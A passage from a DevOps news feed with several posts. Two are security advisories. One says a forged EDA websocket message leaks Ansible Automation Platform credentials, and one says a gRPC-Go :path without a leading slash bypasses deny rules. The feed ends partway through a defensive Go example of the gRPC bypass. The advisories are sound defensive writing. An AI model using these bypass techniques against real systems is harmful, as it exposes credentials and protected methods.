<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>One region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created after the preview opened. Your existing Neon databases will not grow these features in place, which matters if you were hoping to bolt functions onto a production project.</p>
</div></div></div><ul>
<li><strong>Functions are not a job runner.</strong> They are explicitly request/response and real-time, not background jobs. Queued, retryable, cancellable work still belongs to something like QStash or Inngest. That is an honest scoping decision, but it means &quot;move my whole backend here&quot; is not yet on the table.</li>
<li><strong>Fixed function sizing.</strong> Memory is fixed (2048 MiB at preview), so this is not a knob-for-everything compute platform yet.</li>
<li><strong>Billing is half-documented.</strong> The per-model token prices are public and look like pass-through, but Neon has not publicly spelled out whether there is a markup or preview credits on the AI Gateway. For a side project that is noise; for a budget forecast it is a question to ask before you commit.</li>
<li><strong>Lock-in is the real trade.</strong> The whole pitch is integration: one config file, one credential, everything branching together. That convenience is also coupling. An S3-compatible API and standard SDKs keep the exit ramps wider than a fully proprietary stack would, but a <code>neon.ts</code> that declares your functions, buckets, and gateway is, by design, Neon-shaped.</li>
</ul>
<h2 id="h2-who-should-actually-care" class="group relative scroll-mt-24">
        <a href="#h2-who-should-actually-care" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who should actually care
        </a>
        </h2><p>If you run a large, already-wired backend with mature infrastructure-as-code, none of this is urgent. You have solved preview environments, even if the solution is a pile of Terraform and a shared staging bucket.</p>
<p>The teams this is aimed at are the ones for whom that pile is the problem. Specifically:</p>
<ul>
<li><strong>Anyone building agents.</strong> An agent wants a database to remember things, compute that can stream tokens without a timeout, storage for what it generates, and model access. Getting all four from one CLI, branchable together, is a genuinely shorter path than assembling them. It is not a coincidence that the flagship templates are agents and MCP servers.</li>
<li><strong>Teams that live in preview environments.</strong> If every pull request should get a real, isolated backend and yours currently get a database copy plus shared everything-else, branch-scoped functions and storage close that gap.</li>
<li><strong>Small teams shipping AI features.</strong> The combination of &quot;Postgres you already use&quot; and &quot;model calls without managing three provider accounts&quot; removes a couple of the most annoying setup steps.</li>
</ul>
<p>The honest framing is that Neon is making a bet: that the database, not the compute platform, is the right center of gravity for a backend, because the database is where your state and your branching already live. Vercel is making the opposite bet from the compute side, and Supabase has been making a similar bundled-backend bet for years. Whether &quot;everything branches with your data&quot; is a durable advantage or a feature others copy, the next year will tell.</p>
<p>For now, the thing to internalize is that &quot;Neon&quot; no longer means &quot;a Postgres host.&quot; It means a database with compute, storage, and model access growing out of it, all sharing the one trick Neon was already good at. If you have only ever evaluated it as a place to put a connection string, it is worth a second look on those terms.</p>
<p>We benchmark Neon&#39;s database side in depth in our <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">Neon vs Supabase series</a>, and keep a running <a href="https://devops-daily.com/comparisons/neon-vs-supabase">Neon vs Supabase comparison</a> covering architecture and pricing side by side. As these platform features leave preview, we will put them through the same treatment: real projects, real numbers, and the harness published so you can argue with our data instead of someone&#39;s vibes.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[SpaceX Just Bought Cursor for $60B. What That Means If Your Team Lives in It]]></title>
      <link>https://devops-daily.com/posts/spacex-cursor-acquisition-betting-on-one-ai-tool</link>
      <description><![CDATA[SpaceX is acquiring Anysphere, the maker of Cursor, in a $60 billion all-stock deal, the largest acquisition of a venture-backed startup ever. The number is the headline. The real question for engineering teams is what it means to build your daily workflow on a tool whose owner just changed.]]></description>
      <pubDate>Thu, 25 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/spacex-cursor-acquisition-betting-on-one-ai-tool</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[tooling]]></category><category><![CDATA[developer-experience]]></category><category><![CDATA[vendor-lock-in]]></category><category><![CDATA[industry]]></category>
      <content:encoded><![CDATA[<p>On June 16, 2026, SpaceX announced it is acquiring Anysphere, the company behind the AI code editor Cursor, in an all-stock deal valued at about <strong>$60 billion</strong>. Reporting from <a href="https://techcrunch.com/2026/06/16/spacex-to-acquire-cursor-for-60b-in-stock-days-after-blockbuster-ipo/">TechCrunch</a>, <a href="https://www.cnbc.com/2026/06/16/spacex-spcx-cursor-acquisition-ipo.html">CNBC</a>, and others describes it as the largest acquisition of a venture-backed startup on record, landing days after SpaceX&#39;s own blockbuster IPO. Anysphere shareholders take SpaceX stock; the deal is expected to close in the third quarter pending regulatory approval.</p>
<p>The price is the headline everyone is sharing. For an engineering audience, the price is the least interesting part. Cursor reportedly runs around $2.6 billion in annualized revenue, which means a very large number of teams now do their daily work inside an editor whose owner, roadmap, and incentives changed overnight. That is the part worth thinking about, and it is not really a story about Cursor. It is a story about what it means to make any single AI tool load-bearing in how your team ships software.</p>
<h2 id="h2-why-a-devops-audience-should-care-about-an-ma-deal" class="group relative scroll-mt-24">
        <a href="#h2-why-a-devops-audience-should-care-about-an-ma-deal" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why a DevOps audience should care about an M&amp;A deal
        </a>
        </h2><p>Most acquisition coverage is for investors. This one matters operationally because of how deeply AI coding tools have embedded themselves into the workflow in the last two years. An AI editor is not a side utility like a linter you could swap in an afternoon. For teams that have leaned all the way in, it is where code gets written, where context lives, where custom rules and prompts and integrations accumulate. It has quietly become infrastructure.</p>
<p>And infrastructure with a single vendor behind it carries a specific risk that has nothing to do with whether the vendor is good. We watched a version of this play out when <a href="https://devops-daily.com/posts/government-pulled-fable-mythos-what-builders-should-learn">a frontier model was pulled by government order overnight</a> and every team building on it had to scramble. An acquisition is a gentler version of the same lesson: the thing your workflow depends on can change hands, change direction, or change pricing, and your dependency on it is exactly as deep as you let it become.</p>
<h2 id="h2-what-actually-changes-when-the-owner-changes" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-changes-when-the-owner-changes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually changes when the owner changes
        </a>
        </h2><p>Acquisitions rarely break anything on day one. Cursor will keep working tomorrow. The risk is slower and shows up over quarters:</p>
<ul>
<li><strong>Roadmap drift.</strong> A startup optimizes for its users because it has to. A division inside a $2 trillion company optimizes for that company&#39;s strategy, which here is explicitly expanding into enterprise AI. Features you rely on may get more attention, or less, depending on whether they serve the new owner&#39;s goals.</li>
<li><strong>Pricing and packaging.</strong> New ownership eventually means new monetization. The plan you standardized your team on is a decision someone else now controls.</li>
<li><strong>Data and trust posture.</strong> Where your code and prompts go, and who can see them, is governed by the new parent&#39;s policies. For regulated teams that alone is worth a fresh read of the terms.</li>
<li><strong>Continuity.</strong> Most acquisitions go fine. Some lead to products being folded, rebranded, or sunset. You do not need to predict which; you need your workflow to survive either outcome.</li>
</ul>
<p>None of these is a reason to panic. They are reasons to know how exposed you are before the answer matters.</p>
<h2 id="h2-keeping-your-ai-tooling-swappable" class="group relative scroll-mt-24">
        <a href="#h2-keeping-your-ai-tooling-swappable" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Keeping your AI tooling swappable
        </a>
        </h2><p>The healthy response is not to abandon Cursor. It is good software, and it is not going anywhere this quarter. The response is to make sure your team&#39;s ability to work does not depend on it continuing to be exactly what it is today. A few habits keep the optionality cheap:</p>
<ol>
<li><strong>Keep the AI layer separable from the workflow.</strong> The more your build, review, and CI processes assume one specific editor, the harder a future switch becomes. Treat the AI assistant as an accelerant on top of a workflow that works without it, not as the workflow.</li>
<li><strong>Do not hard-wire to proprietary-only features.</strong> Every vendor offers sticky features that lock you in. Use them with eyes open, and keep the core of how you work expressible in tools you do not control. Most AI editors speak the same underlying model APIs; the lock-in is in the surrounding glue.</li>
<li><strong>Keep a qualified alternative warm.</strong> You do not have to use a second tool daily, but knowing that your team could move to another AI editor or assistant in a week, because you have tried it and it fits, turns a forced migration from a crisis into a decision.</li>
<li><strong>Watch the ownership and policy surface, not just the changelog.</strong> Acquisitions, pricing changes, and data-policy updates do not show up in release notes. For a tool this central, someone should be tracking the business news the way you track its features.</li>
</ol>
<p>This is the same playbook we argued for with <a href="https://devops-daily.com/posts/ai-sre-agents-what-they-fix-and-break">AI SRE agents</a> and with model providers generally: adopt the useful thing, get real value from it, and keep your ability to leave proportional to how much you depend on it.</p>
<h2 id="h2-the-honest-read" class="group relative scroll-mt-24">
        <a href="#h2-the-honest-read" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The honest read
        </a>
        </h2><p>It is easy to turn a $60 billion headline into a hot take in either direction: that this validates AI coding, or that it signals a bubble. Neither is a useful conclusion for someone who has to ship code on Monday. The useful conclusion is narrower and more durable: AI development tools are consolidating into the hands of large platform companies, and the tools your team treats as essential are increasingly owned by entities whose priorities are not your productivity.</p>
<p>That is not a crisis. Cursor users are not in trouble, and good tools getting resources can mean better tools. It is simply a prompt to check a dependency you may not have consciously chosen to take on. The teams that will be unbothered by whatever Cursor becomes under SpaceX are the ones who could switch if they had to, and who therefore never have to.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Your Automation Platform Is a Credential Honeypot: Ansible CVE-2026-11807]]></title>
      <link>https://devops-daily.com/posts/ansible-automation-platform-credential-leak-cve-2026-11807</link>
      <description><![CDATA[A missing authorization check in Event-Driven Ansible lets any logged-in user pull plaintext vault passwords, SSH keys, and OAuth tokens out of Ansible Automation Platform. It is a CVSS 9.6, it is patched, and it is a reminder of what your automation control plane really holds.]]></description>
      <pubDate>Thu, 25 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ansible-automation-platform-credential-leak-cve-2026-11807</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[security]]></category><category><![CDATA[ansible]]></category><category><![CDATA[cve]]></category><category><![CDATA[secrets]]></category><category><![CDATA[automation]]></category>
      <content:encoded><![CDATA[<p>Think about what your automation platform actually stores. To configure a fleet, Ansible Automation Platform (AAP) holds the credentials to reach that fleet: SSH keys to your servers, vault passwords that unlock your secrets, OAuth tokens to your cloud accounts. The whole point of the platform is that it is the one system trusted to talk to everything else. That also makes it the single richest target you operate, and CVE-2026-11807 is what happens when the lock on that target slips.</p>
<p>The bug, disclosed in late June 2026 and rated <strong>CVSS 9.6 (critical)</strong>, lets <em>any authenticated user</em> retrieve those credentials in plaintext. Not an admin. Anyone who can log in. Here is what it is, who it hits, and the broader point it makes about where your secrets really live.</p>
<h2 id="h2-what-the-bug-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug is
        </a>
        </h2><p>The flaw lives in Event-Driven Ansible (EDA), the part of AAP that reacts to events and triggers rulebooks. EDA exposes a websocket API at <code>/api/eda/ws/ansible-rulebook</code> for worker processes to communicate. The problem: that endpoint did not verify the caller&#39;s permissions when processing worker messages. It assumed anyone connecting was a legitimate worker.</p>
<p>So an authenticated user can connect to that websocket and send a forged worker message carrying an arbitrary <code>activation_id</code>. The server, trusting the message, responds with the credentials associated with that activation, and it returns them in plaintext. According to Red Hat&#39;s advisory those credentials include OAuth tokens, vault passwords, and SSH keys: the exact material an attacker needs to move from &quot;I have a low-privilege login&quot; to &quot;I own everything this platform manages.&quot;</p>
<p>The CVSS vector explains the 9.6: network attack vector, low complexity, no user interaction, and a low privilege requirement (you need to be authenticated, but nothing more). The only reason it is not a perfect 10 is that &quot;authenticated&quot; bar, which in many real deployments is a low one.</p>
<h2 id="h2-who-is-affected" class="group relative scroll-mt-24">
        <a href="#h2-who-is-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who is affected
        </a>
        </h2><p>You are exposed if you run <strong>Ansible Automation Platform 2.5 or 2.6</strong> with Event-Driven Ansible. The dangerous shape is the common one: an AAP instance that more than a handful of people can log into, where those people are not all equally trusted with every credential the platform holds. That describes most real installations, because the whole value of a shared automation platform is that teams share it.</p>
<p>The attacker does not need to be an outsider. The bug turns any authenticated account, a contractor, a junior engineer, a service account with a leaked token, into a path to the keys for your entire managed estate.</p>
<h2 id="h2-fixing-it" class="group relative scroll-mt-24">
        <a href="#h2-fixing-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fixing it
        </a>
        </h2><p>Red Hat has shipped patches. Update to the fixed releases:</p>
<ul>
<li><strong>AAP 2.5</strong>: apply the update from advisory <strong>RHSA-2026:28497</strong>.</li>
<li><strong>AAP 2.6</strong>: apply the update from advisory <strong>RHSA-2026:28492</strong>.</li>
</ul>
<p>Patching closes the hole, but with a credential-exposure bug you should assume the worst about the window before you patched. If your AAP was reachable by anyone you would not hand your root SSH keys to, treat the exposed credentials as potentially compromised:</p>
<ol>
<li><strong>Patch first</strong>, on both the controller and any EDA components.</li>
<li><strong>Rotate the secrets the platform held</strong>: SSH keys, vault passwords, OAuth tokens, anything stored as an AAP credential. This is the step teams skip and the one that actually closes the incident, because the patch stops future leaks but does nothing about credentials that may already be out.</li>
<li><strong>Review who can authenticate to AAP at all</strong>, and prune it. The blast radius of this bug was set by your login list.</li>
</ol>
<h2 id="h2-the-broader-point-automation-platforms-are-credential-honeypots" class="group relative scroll-mt-24">
        <a href="#h2-the-broader-point-automation-platforms-are-credential-honeypots" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The broader point: automation platforms are credential honeypots
        </a>
        </h2><p>Strip away the specifics and CVE-2026-11807 is a lesson about a category, not a product. Your automation control plane is, by design, the place where the most powerful credentials in your organization are concentrated. AAP holds the keys to the fleet. A CI/CD runner holds deploy keys, registry tokens, and cloud credentials. A low-code automation tool like n8n holds the API keys to every service it touches. These systems earn their value by being trusted with everything, which is exactly what makes a single authorization slip in one of them catastrophic.</p>
<p>That reframes how you should treat them:</p>
<ul>
<li><strong>Least privilege on who can log in, not just on what they can do.</strong> This bug bypassed the &quot;what they can do&quot; layer entirely. The only control that held was &quot;who is in the door,&quot; so make that list short and reviewed.</li>
<li><strong>Segment the credential store.</strong> If one platform holds the keys to production, staging, and every cloud account, one bug owns all three. Separate credentials by blast radius so a single platform compromise is not a total one.</li>
<li><strong>Plan for rotation before you need it.</strong> The teams who patch this fast and shrug are the ones who can rotate every AAP-held secret with a script. If rotating your automation credentials is a manual, scary, all-day job, that is a finding in itself.</li>
<li><strong>Watch the advisories for the tools that hold your keys,</strong> not just the apps you write. The software most worth patching urgently is the software trusted with the most, and that is usually your automation and CI platforms, not your web app.</li>
</ul>
<p>Patch CVE-2026-11807 today if you run AAP. Then sit with the uncomfortable question it raises: if any logged-in user could have walked out with your SSH keys this week, what does that say about how much trust is concentrated in one place, and how quickly you could rotate your way out of it?</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Kubernetes 1.37 Just Locked Its Feature Set: What Made the Cut]]></title>
      <link>https://devops-daily.com/posts/kubernetes-1-37-feature-freeze-whats-locked-in</link>
      <description><![CDATA[The enhancements freeze for Kubernetes 1.37 landed on June 17, so the shape of the August release is now decided. GPU partitioning keeps maturing for AI workloads, and a cgroup v1 change will stop some kubelets from starting. Here is what is locked in and what to check before you upgrade.]]></description>
      <pubDate>Wed, 24 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/kubernetes-1-37-feature-freeze-whats-locked-in</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[kubernetes]]></category><category><![CDATA[cloud-native]]></category><category><![CDATA[dra]]></category><category><![CDATA[gpu]]></category><category><![CDATA[upgrades]]></category>
      <content:encoded><![CDATA[<p>Every Kubernetes release has a moment where the feature set stops being a wish list and becomes a plan. That moment is the enhancements freeze, and for <strong>Kubernetes 1.37 it landed on June 17, 2026</strong>. After it, no new KEP joins the release; the cycle is about landing and stabilizing what already made the cut. The code freeze follows on July 22 to 23, and <strong>1.37 ships on August 26</strong>.</p>
<p>So this is the right time to look at what is coming, while there is still runway to prepare. The headline is continuity rather than fireworks: 1.37 keeps pushing on AI infrastructure, and it carries one cleanup that will stop some nodes from booting if you are not ready. Worth noting up front: until code freeze, graduation levels can still slip, so treat specifics as the current plan, not a signed release note.</p>
<h2 id="h2-the-theme-gpus-you-can-slice" class="group relative scroll-mt-24">
        <a href="#h2-the-theme-gpus-you-can-slice" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The theme: GPUs you can slice
        </a>
        </h2><p>The throughline of the last several Kubernetes releases has been Dynamic Resource Allocation (DRA), the framework that lets pods request specialized hardware (GPUs, accelerators, NICs) with far more nuance than the old &quot;give me one GPU&quot; model. DRA core went GA back in 1.34, and each release since has extended it.</p>
<p>In 1.37 the work continues on <strong>partitionable devices</strong> (<a href="https://github.com/kubernetes/enhancements/issues/4815">KEP-4815</a>), which entered alpha in 1.36. The idea is exactly what it sounds like: take one physical GPU and carve it into smaller logical slices that schedule independently to different pods. For AI and ML teams this is the feature that matters, because a single modern accelerator is often far bigger than one inference workload needs, and bin-packing several tenants onto one card is the difference between a GPU that pays for itself and one that idles. This is the same economic pressure behind the memory and accelerator crunch we wrote about in <a href="https://devops-daily.com/posts/hetzner-doubled-prices-ai-memory-crunch">the Hetzner price piece</a>: when the hardware is scarce and expensive, the platform that lets you subdivide it wins.</p>
<p>If you run GPU workloads on Kubernetes, partitionable devices is the 1.37 line item to read the KEP on and test in a non-production cluster, because it changes how you model capacity.</p>
<h2 id="h2-the-change-that-can-stop-kubelet-from-starting" class="group relative scroll-mt-24">
        <a href="#h2-the-change-that-can-stop-kubelet-from-starting" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The change that can stop kubelet from starting
        </a>
        </h2><p>Here is the one that belongs on your upgrade checklist rather than your &quot;nice to have&quot; list. <strong>Kubernetes 1.37 tightens the cgroup v1 retirement.</strong> If you are still running cgroup v1 nodes and have not set <code>failCgroupV1: false</code>, the kubelet will refuse to start on 1.37. The kubelet now relies entirely on detecting the cgroup driver from the container runtime (the <code>KubeletCgroupDriverFromCRI</code> behavior that went GA in 1.36), with the legacy manual driver flags removed.</p>
<p>In plain terms: a node that came up fine on 1.36 can fail to come up on 1.37 if it is still on cgroup v1. Most modern distributions moved to cgroup v2 a while ago, but if you run older base images, custom node images, or long-lived on-prem hosts, check this before you roll the upgrade, not during it. The same release also completes the removal of <strong>containerd 1.x support</strong>: 1.37 expects containerd 2.0 or later.</p>
<p>Neither of these is a surprise; both have been telegraphed for several releases. But &quot;telegraphed&quot; and &quot;handled in your fleet&quot; are different things, and this is the release where the warnings turn into hard failures.</p>
<h2 id="h2-the-rest-of-the-shape" class="group relative scroll-mt-24">
        <a href="#h2-the-rest-of-the-shape" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The rest of the shape
        </a>
        </h2><p>Beyond those two, 1.37 reads as a consolidation release. DRA is the marquee work, the cgroup and containerd removals are the operational edges, and a long tail of smaller enhancements continues maturing features that went beta in 1.36 (such as the WebSocket-to-kubelet streaming work). For scale, 1.36 shipped 70 enhancements split across stable, beta, and alpha, and 1.37 continues directly from that base; the exact stable-versus-beta split for 1.37 firms up at code freeze in late July.</p>
<p>That &quot;consolidation&quot; framing is not a criticism. After several releases of aggressive AI-driven change, a cycle spent hardening DRA and finishing long-deprecated removals is exactly what operators want. The exciting releases make headlines; the consolidation releases are the ones that let you sleep.</p>
<h2 id="h2-what-to-do-now" class="group relative scroll-mt-24">
        <a href="#h2-what-to-do-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to do now
        </a>
        </h2><ol>
<li><strong>Audit your nodes for cgroup v1 before August.</strong> This is the change most likely to bite. Confirm your node images are on cgroup v2, and if any are not, plan the migration or set the flag deliberately rather than discovering it when a node will not register.</li>
<li><strong>Confirm containerd 2.0+ across the fleet.</strong> Pair it with the cgroup check; both are runtime-level and both turn into hard failures here.</li>
<li><strong>If you run GPUs, read <a href="https://github.com/kubernetes/enhancements/issues/4815">KEP-4815</a> and test partitioning in staging.</strong> It is alpha-track, so it is opt-in, but it is the feature most likely to change how you plan capacity in 2026.</li>
<li><strong>Wait for the official release notes before production.</strong> 1.37 is in alpha now (1.37.0-alpha.1 landed June 10) and GA is August 26. Plan now, upgrade when it is stable and your runtime checks pass.</li>
</ol>
<p>The pattern across 2026&#39;s Kubernetes releases has been steady: more for AI hardware, fewer escape hatches for legacy node configuration. 1.37 is squarely in that groove. The upgrade itself should be calm, as long as your nodes are on cgroup v2 and a current containerd before you start.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[The gRPC-Go Auth Bypass Hiding in Your Dependency Tree: CVE-2026-33186]]></title>
      <link>https://devops-daily.com/posts/grpc-go-authorization-bypass-cve-2026-33186</link>
      <description><![CDATA[A missing leading slash lets requests slip past gRPC-Go authorization rules. It is a CVSS 9.1, it is fixed in 1.79.3, and because gRPC-Go is a transitive dependency in a huge slice of cloud-native Go, you may be shipping it without knowing. Here is how to find out.]]></description>
      <pubDate>Wed, 24 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/grpc-go-authorization-bypass-cve-2026-33186</guid>
      <category><![CDATA[Security]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[security]]></category><category><![CDATA[grpc]]></category><category><![CDATA[golang]]></category><category><![CDATA[cve]]></category><category><![CDATA[supply-chain]]></category>
      <content:encoded><![CDATA[<p>Most authorization bugs are loud: a missing check, an admin route with no guard. CVE-2026-33186 is the quieter kind, the sort that passes code review because the check is right there in the code and looks correct. The flaw is not in your policy. It is in a single character that decides whether your policy is consulted at all.</p>
<p>It is rated <strong>CVSS 9.1 (critical)</strong>, it lives in <code>google.golang.org/grpc</code>, and the reason it matters for you specifically is that gRPC-Go is rarely a dependency you chose on purpose. It rides in transitively under Kubernetes clients, observability agents, service meshes, cloud SDKs, and dozens of other Go modules. You can be exposed without a single line of gRPC in your own code. This post is what the bug is, who it actually affects, and the commands to check your own tree in a couple of minutes.</p>
<h2 id="h2-what-the-bug-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug is
        </a>
        </h2><p>gRPC runs over HTTP/2, and every call carries a <code>:path</code> pseudo-header that names the method, canonically with a leading slash: <code>/myapp.Orders/Cancel</code>.</p>
<p>The vulnerable gRPC-Go server was too forgiving. It also accepted the same path <em>without</em> the leading slash, <code>myapp.Orders/Cancel</code>, and still routed it to the correct handler. On its own that is a harmless bit of leniency. It becomes a security hole the moment authorization runs as an interceptor that matches on the path string, which is exactly how the official <code>grpc/authz</code> package and most hand-rolled interceptors work.</p>
<p>Here is the sequence:</p>
<ol>
<li>A request arrives with <code>:path</code> of <code>myapp.Orders/Cancel</code> (no leading slash).</li>
<li>The authorization interceptor evaluates its rules against that raw string. A deny rule written canonically as <code>/myapp.Orders/Cancel</code> does not match, because <code>myapp.Orders/Cancel</code> is a different string.</li>
<li>If the policy has a permissive fallback (a catch-all &quot;allow&quot; when nothing else matched, a common shape), the request is allowed.</li>
<li>The router, being lenient, sends it to the real <code>Cancel</code> handler anyway.</li>
</ol>
<p>The deny rule was correct. It just never got a chance to fire, because the string it was asked about was not the string it was written for. This is a textbook canonicalization bug (CWE-285, improper authorization), and its blast radius is &quot;authorization, silently skipped.&quot;</p>
<p>The CVSS vector tells the story: network attackable, no privileges, no user interaction, high confidentiality and integrity impact. The one piece of good news is that there is no availability impact: this leaks and mutates, it does not crash.</p>
<h2 id="h2-who-is-actually-affected" class="group relative scroll-mt-24">
        <a href="#h2-who-is-actually-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who is actually affected
        </a>
        </h2><p>Not every gRPC-Go server. You are exposed if all of these hold:</p>
<ul>
<li>You run a gRPC-Go <strong>server</strong> on a version <strong>before 1.79.3</strong>.</li>
<li>You enforce authorization in an <strong>interceptor that keys on the method path</strong>, either <code>google.golang.org/grpc/authz</code> or a custom interceptor that reads <code>info.FullMethod</code>.</li>
<li>Your policy relies on <strong>deny rules with a permissive fallback</strong>, rather than default-deny with explicit allows.</li>
</ul>
<p>If your authorization is default-deny (nothing is allowed unless a rule explicitly permits it), the non-canonical path fails to match your <em>allow</em> rules too, so the request is rejected and you are not exploitable through this path. That is worth sitting with: the teams hit hardest here are the ones using blocklist-style policies, and the teams who modelled authorization as a strict allowlist mostly dodged it. Default-deny earns its keep again.</p>
<h2 id="h2-find-it-in-your-own-tree" class="group relative scroll-mt-24">
        <a href="#h2-find-it-in-your-own-tree" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Find it in your own tree
        </a>
        </h2><p>The hard part is not fixing this, it is discovering that you ship it at all, since it is almost always transitive. Three checks, fastest first.</p>
<p>List every version of gRPC-Go anywhere in your module graph:</p>
<pre><code class="hljs language-bash">go list -m all | grep google.golang.org/grpc
</code></pre><p>If anything there is below <code>1.79.3</code>, keep going. To see <em>why</em> it is in your build (which of your direct dependencies drags it in), ask:</p>
<pre><code class="hljs language-bash">go mod why -m google.golang.org/grpc
</code></pre><p>That prints the import chain, which tells you whether you can bump it directly or need to wait on (or prod) an upstream dependency to update.</p>
<p>Best of all, let the official vulnerability scanner connect the CVE to your actual code paths:</p>
<pre><code class="hljs language-bash">go install golang.org/x/vuln/cmd/govulncheck@latest
govulncheck ./...
</code></pre><p><code>govulncheck</code> is the one to trust, because it does call-graph analysis: it reports the vulnerability as actually reachable only if your binary really calls the affected code, which cuts the noise of &quot;it is in the tree but never executed.&quot; For a CI gate, it is a clean addition.</p>
<h2 id="h2-fixing-it" class="group relative scroll-mt-24">
        <a href="#h2-fixing-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Fixing it
        </a>
        </h2><p>The direct fix is to move gRPC-Go to <strong>1.79.3 or later</strong>:</p>
<pre><code class="hljs language-bash">go get google.golang.org/grpc@v1.79.3
go mod tidy
</code></pre><p>The patch makes the server reject any <code>:path</code> without a leading slash, returning <code>codes.Unimplemented</code> instead of quietly routing it. If the vulnerable version is transitive and the dependency that pulls it in has not updated yet, a temporary <code>replace</code> directive or a Go module <code>exclude</code> can hold the line until upstream catches up, though a direct <code>require</code> bump is cleaner where the graph allows it.</p>
<p>There is also a defense-in-depth lesson worth banking regardless of this CVE: authorization that matches on a raw, externally-supplied string is fragile. Canonicalize the input before you evaluate policy against it, prefer default-deny over deny-with-fallback, and treat the path in an interceptor as untrusted until normalized. Those habits would have made this specific bug a non-event.</p>
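<p>The request sequence from &quot;What the bug is&quot; and the canonicalize-then-default-deny advice above, worked through as an added Go example (not code from gRPC-Go or from this post). It models the interceptor and router with plain string matching instead of the real gRPC types; the method names, policies and function names are constructed for illustration.</p>

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Constructed sample service: the article's /myapp.Orders/Cancel method plus
// one hypothetical read method.
var handlers = map[string]bool{
	"/myapp.Orders/Cancel": true,
	"/myapp.Orders/Get":    true,
}

// Constructed policies. The blocklist denies Cancel and allows everything
// else; the allowlist permits Get and nothing else.
var denied = map[string]bool{"/myapp.Orders/Cancel": true}
var allowed = map[string]bool{"/myapp.Orders/Get": true}

var errNonCanonical = errors.New("method path is not /service/method")

// lenientRoute models the pre-fix routing described above: the path resolves
// to a handler whether or not it carries the leading slash.
func lenientRoute(rawPath string) bool {
	return handlers["/"+strings.TrimPrefix(rawPath, "/")]
}

// strictRoute models the patched behaviour: only the canonical form routes.
func strictRoute(rawPath string) bool {
	return handlers[rawPath]
}

// blocklistAllows is the fragile shape: deny rules compared against the raw
// string (what an interceptor reads from info.FullMethod), then a catch-all.
func blocklistAllows(rawPath string) bool {
	if denied[rawPath] {
		return false
	}
	return true // permissive fallback: nothing matched, so allow
}

// canonicalMethod accepts exactly "/service/method" and rejects anything
// else, so policy is only ever evaluated against one spelling of a method.
func canonicalMethod(rawPath string) (string, error) {
	if !strings.HasPrefix(rawPath, "/") {
		return "", errNonCanonical
	}
	parts := strings.Split(rawPath[1:], "/")
	if len(parts) != 2 || parts[0] == "" || parts[1] == "" {
		return "", errNonCanonical
	}
	return rawPath, nil
}

// allowlistAllows is the hardened shape: canonicalize first, then default-deny.
func allowlistAllows(rawPath string) bool {
	method, err := canonicalMethod(rawPath)
	if err != nil {
		return false
	}
	return allowed[method]
}

// reached reports whether a request gets to its handler: the interceptor
// must allow it and the router must resolve it.
func reached(allowedByPolicy, routed bool) bool {
	if !allowedByPolicy {
		return false
	}
	return routed
}

// Outcome records whether one request reaches a handler in each setup.
type Outcome struct {
	Path          string
	Vulnerable    bool // lenient router + blocklist with fallback
	PatchedRouter bool // strict router + the same blocklist
	Hardened      bool // lenient router + canonicalize + default-deny
}

// Evaluate runs one raw :path value through all three setups.
func Evaluate(rawPath string) Outcome {
	return Outcome{
		Path:          rawPath,
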